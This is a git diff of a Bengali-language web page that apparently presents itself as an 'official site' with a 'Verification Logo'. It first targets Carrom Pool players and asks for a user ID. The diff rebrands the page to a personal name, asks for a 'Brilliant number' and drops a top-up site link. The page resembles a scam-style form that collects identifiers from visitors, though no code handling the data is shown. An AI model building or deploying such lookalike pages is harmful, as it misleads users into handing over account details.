--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Carrom Pool</title>
+    <title>Sofiqul Islam</title>
     <style>
         body {
             font-family: Arial, sans-serif;
@@ -181,7 +181,7 @@
 <body>
 
     <div class="header">
-        <h1>Carrom Pool</h1>
+        <h1>Sofiqul Islam</h1>
         <img src="https://i.ibb.co/5FZ6HmM/12559876.png" alt="Verification Logo">
         <div class="subtext">official site</div>
     </div>
@@ -245,8 +245,8 @@
     </div>
 
     <div class="container" id="userIdForm">
-        <h2>Carrom User ID লিখুন</h2>
-        <input type="text" placeholder="Carrom User ID দিন" id="userIdInput">
+        <h2>আপনার ব্রিলিয়ান্ট নাম্বার দিন</h2>
+        <input type="text" placeholder="ব্রিলিয়ান্ট নাম্বার দিন" id="userIdInput">
         <button class="button submit" onclick="submitUserId()">Submit</button>
         <button class="button back" onclick="goBack('userIdForm')">Back</button> <!-- Back button added -->
     </div>
@@ -282,14 +282,6 @@
             <button>
                 <img src="https://i.ibb.co/MNDskzJ/2936956.png" alt="Icon 3">
                 Live Chat
-            </button>
-        </a>
-    </div>
-    <div class="footer">
-        <a href="https://carrompooltopup.github.io/website/" target="_blank">
-            <button>
-                <img src="https://i.ibb.co.com/vkp3nbt/notification.gif" alt="Icon 2">
-                 
             </button>
         </a>
     </div>
